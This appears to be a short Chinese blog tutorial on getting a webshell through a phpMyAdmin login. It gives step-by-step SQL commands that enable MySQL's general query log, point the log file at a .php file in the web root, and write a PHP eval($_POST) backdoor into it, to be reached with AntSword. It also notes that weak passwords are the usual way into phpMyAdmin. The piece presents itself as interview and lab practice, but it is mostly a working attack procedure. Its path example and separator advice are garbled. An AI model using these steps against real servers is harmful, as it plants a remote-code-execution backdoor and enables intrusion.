这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是写日志getshell。为了防止大家继续踩坑,特地科普一波。
大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么处理。
前提:mysql>5.0版本,进入phpmyadmin后台(一般都是弱口令进去)。
1.在知道网站绝对路径的情况下,直接去第二步,如果不知道网站绝对路径的情况下
#查看数据库存放路径
select @@datadir;
然后根据数据库存放路径猜测网站的绝对路径。
2.查看日志是否开启
show variables like '%general%';
一般这个日志记录是默认关闭的,需要我们手动开启
3.开启日志记录
SET GLOBAL general_log='on';
4.修改日志路径
set global general_log_file='D:phpStudyWWWshell.php';
#这里一定要用,或者使用/,不能使用。
5.写入shell
select "<?php eval($_POST['gg']);?>";
6.这样就可以用蚁剑连接我们的shell了。
首发于:
Phpmyadmin写日志getshell | web安全学习者的小窝www.lstazl.com